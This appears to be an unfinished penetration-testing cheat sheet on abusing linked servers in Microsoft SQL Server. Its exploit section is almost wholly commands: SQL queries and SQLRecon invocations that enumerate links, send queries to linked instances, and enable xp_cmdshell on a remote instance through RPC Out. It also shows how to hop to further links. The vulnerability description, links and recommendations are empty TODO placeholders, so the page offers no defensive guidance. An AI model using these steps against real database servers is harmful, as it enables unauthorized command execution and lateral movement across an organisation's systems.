Links Abuse

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit
4. Useful links
5. Recommendations

---

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

• Having sysadmin rights on the Microsoft SQL instance.

Exploit

To enumerate links with you instance, use SELECT srvname, srvproduct, rpcout FROM master..sysservers; query or SQLRecon.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:links

To send a query to a linked instance, use SELECT * FROM OPENQUERY("$target", '$query'); or - again - SQLRecon.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:lquery /l:$target /c:"$query"

If RPC Out is enabled on the link, you can leverage it to enable xp_cmdshell with following queries.

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [$target]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [$target]

You can even list any further links on your target and renew the operation.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:llinks /l:$target

Useful links

• TODO: List links here.

Recommendations

• TODO: List recommendations here.